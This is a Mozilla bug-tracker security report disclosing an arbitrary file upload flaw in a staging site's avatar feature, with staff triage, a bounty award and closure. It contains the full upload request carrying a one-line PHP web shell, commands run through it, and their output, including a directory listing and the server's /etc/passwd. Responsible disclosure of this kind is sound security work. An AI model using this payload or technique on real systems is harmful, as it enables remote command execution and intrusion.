Arbitrary file uploading vulnerability in badger.stage.mozilla.com

VERIFIED FIXED

Status

Websites
Other
--
blocker
VERIFIED FIXED
7 years ago
4 years ago

People

(Reporter: Luca De Fulgentis, Unassigned)

Tracking

unspecified
Dependency tree / graph
Bug Flags:
sec-bounty +

Details

(Whiteboard: [infrasec:osinject][ws:critical], URL)

(Reporter)

Description

7 years ago
User-Agent:       Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Build Identifier: 

Hello Mozilla,
I found a critical vulnerability in badger.stage.mozilla.com's avatar image upload functionality. I was able to upload a php shell and execute commands on remote server. The following is an http request resulting in a web shell
uploading:

POST /avatar/change/ HTTP/1.1
Host: badger.stage.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://badger.stage.mozilla.com/avatar/change/
Cookie: csrftoken=c0660b8a28bcb9cb1d81cb8c39f0c7ff; sessionid=9b456284ccc6788d116b0655c6314d49
Content-Type: multipart/form-data; boundary=---------------------------8752007212818
Content-Length: 369

-----------------------------8752007212818
Content-Disposition: form-data; name="csrfmiddlewaretoken"

c0660b8a28bcb9cb1d81cb8c39f0c7ff
-----------------------------8752007212818
Content-Disposition: form-data; name="avatar"; filename="c.php"
Content-Type: application/octet-stream

<?php system($_GET['cmd']); ?>
-----------------------------8752007212818--

Here is the output of execution of some commands via the remote shell:

http://badger.stage.mozilla.com/site_media/media/avatars/daath1/c.php?cmd=ls%20-al%20/data/www/www.mozilla.org/

total 488
drwxr-xr-x  46 root root   4096 May 31 20:20 .
drwxr-xr-x 115 root root   4096 Mar  1 20:05 ..
-rw-r--r--   1 root root 117388 Apr 19 19:50 .htaccess
drwxr-xr-x   6 root root   4096 May 31 20:20 .svn
-rw-r--r--   1 root root   1245 Apr 19 19:50 403.html
-rw-r--r--   1 root root   2376 Apr 19 19:50 404.html
-rw-r--r--   1 root root    697 Apr 19 19:50 410.html
-rw-r--r--   1 root root   1120 Apr 19 19:50 500.html
-rw-r--r--   1 root root    413 Aug 11  2009 503.html
drwxr-xr-x   5 root root   4096 May  4 06:52 MPL
-rw-r--r--   1 root root   1695 May 10 21:20 README
drwxr-xr-x   7 root root   4096 Apr 14 15:10 about
drwxr-xr-x  13 root root   4096 Feb 10 17:10 access
drwxr-xr-x   3 root root   4096 Aug 25  2009 book
drwxr-xr-x   4 root root   4096 Aug 21  2009 cache
drwxr-xr-x   5 root root   4096 Feb 10 17:10 causes
drwxr-xr-x   4 root root   4096 Feb 18 22:20 community
drwxr-xr-x   3 root root   4096 Dec  8 13:11 contact
drwxr-xr-x   7 root root   4096 May 27 13:30 contribute
drwxr-xr-x   3 root root   4096 Feb 10 17:10 credits
lrwxrwxrwx   1 root root      5 Aug 25  2009 css -> style
drwxr-xr-x   3 root root   4096 Feb 18 22:20 developer
drwxr-xr-x   9 root root   4096 Aug 26  2009 directory
drwxr-xr-x   8 root root   4096 Dec  8 13:10 docs
drwxr-xr-x   6 root root   4096 Feb  1 09:10 drumbeat
drwxr-xr-x   8 root root   4096 Dec  8 13:11 editor
-rw-r--r--   1 root root   1406 Jul 29  2009 favicon.ico
drwxr-xr-x   3 root root   4096 Feb 18 22:20 firefox
drwxr-xr-x  11 root root   4096 Feb 24 12:10 foundation
drwxr-xr-x  12 root root   4096 Dec  8 13:10 grants
drwxr-xr-x   7 root root   4096 Feb 10 17:10 hacking
drwxr-xr-x  12 root root  12288 Mar 23 15:01 images
drwxr-xr-x   6 root root   4096 May 11 13:10 includes
-rw-r--r--   1 root root  21581 Feb 10 17:10 index.de.html
-rw-r--r--   1 root root  21463 Feb 10 17:10 index.fr.html
-rw-r--r--   1 root root  21197 Feb 10 17:10 index.hr.html
-rw-r--r--   1 root root  20988 Apr 14 15:20 index.html
-rw-r--r--   1 root root  17234 May 31 20:20 index.pt-BR.html
-rw-r--r--   1 root root  21475 Feb 10 17:10 index.sq.html
drwxr-xr-x   6 root root   4096 May 30 08:30 join
drwxr-xr-x  12 root root   4096 Dec  8 13:11 js
drwxr-xr-x   4 root root   4096 Jul 29  2009 keymaster
drwxr-xr-x   4 root root   4096 Jul 29  2009 legal
drwxr-xr-x  11 root root   4096 Dec  8 13:10 newlayout
drwxr-xr-x   6 root root   4096 Feb 10 17:10 parks
drwxr-xr-x  10 root root   4096 Aug 25  2009 performance
drwxr-xr-x   5 root root   4096 May 18 12:01 phonebook
drwxr-xr-x   8 root root   4096 Aug 11  2009 ports
drwxr-xr-x   3 root root   4096 Feb 10 17:10 privacy
drwxr-xr-x  37 root root   4096 Feb 18 22:20 projects
drwxr-xr-x   4 root root   4096 Dec  8 13:11 rdf
-rw-r--r--   1 root root   1138 Oct 21  2009 refresh-press-center-feed.php
drwxr-xr-x   4 root root   4096 Feb 10 17:10 rhino
drwxr-xr-x   4 root root   4096 Dec  8 13:11 script
drwxr-xr-x   4 root root   4096 Aug 31  2009 scriptable
drwxr-xr-x   5 root root   4096 Feb 10 17:10 security
drwxr-xr-x   3 root root   4096 Dec  8 13:11 start
drwxr-xr-x   7 root root   4096 May 31 20:20 style
drwxr-xr-x   3 root root   4096 Dec  8 13:11 support
drwxr-xr-x   4 root root   4096 Dec  4  2009 test-l10n
drwxr-xr-x   5 root root   4096 Jul 29  2009 themes
drwxr-xr-x   4 root root   4096 Dec  8 13:10 unix

http://badger.stage.mozilla.com/site_media/media/avatars/daath1/c.php?cmd=cat%20/etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
nagios:x:100:101:nagios:/var/log/nagios:/bin/sh
apache:x:48:48:Apache:/var/www:/bin/bash
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
splunk:x:500:500:Splunk Server:/opt/splunk:/bin/false
hpsmh:x:101:501::/opt/hp/hpsmh:/sbin/nologin
ganglia:x:102:102:Ganglia Monitoring System:/var/lib/ganglia:/sbin/nologin
avahi-autoipd:x:103:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
memcached:x:104:104:Memcached daemon:/var/run/memcached:/sbin/nologin
processor:x:501:502::/home/processor:/bin/bash
lars:x:502:503::/home/lars:/bin/bash
rabbitmq:x:105:105:RabbitMQ messaging server:/var/lib/rabbitmq:/bin/bash
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin

Thanks,
Luca.


Reproducible: Always
(Reporter)

Updated

7 years ago
Whiteboard: [ws:critical]

Comment 1

7 years ago
Thanks for the report Luca. We're looking into the issue now.
Severity: normal → blocker
Status: UNCONFIRMED → NEW
Ever confirmed: true
OS: Windows 7 → All
Hardware: x86 → All
Whiteboard: [ws:critical] → [infrasec:osinject][ws:critical]

Updated

7 years ago
Depends on: 661356

Comment 2

7 years ago
Bug# 661356 has been filed to disable the staging environment while we work on a fix. Thanks again for the report.
Depends on: 661444
Depends on: 661446
This bug qualifies for the full $3000 web bounty. Thanks!
badger.stage.mozilla.com is now offline per bug 661356. Closing this issue.
Status: NEW → RESOLVED
Last Resolved: 7 years ago
Resolution: --- → FIXED
Note: A root cause investigation for this issue is in progress and captured in bug 662805
This issue has been resolved, however bug 662805 contains some ongoing discussion of this and related issues.
Status: RESOLVED → VERIFIED
Group: websites-security

Updated

6 years ago
Blocks: 836522
Flags: sec-bounty+
You need to log in before you can comment on or make changes to this bug.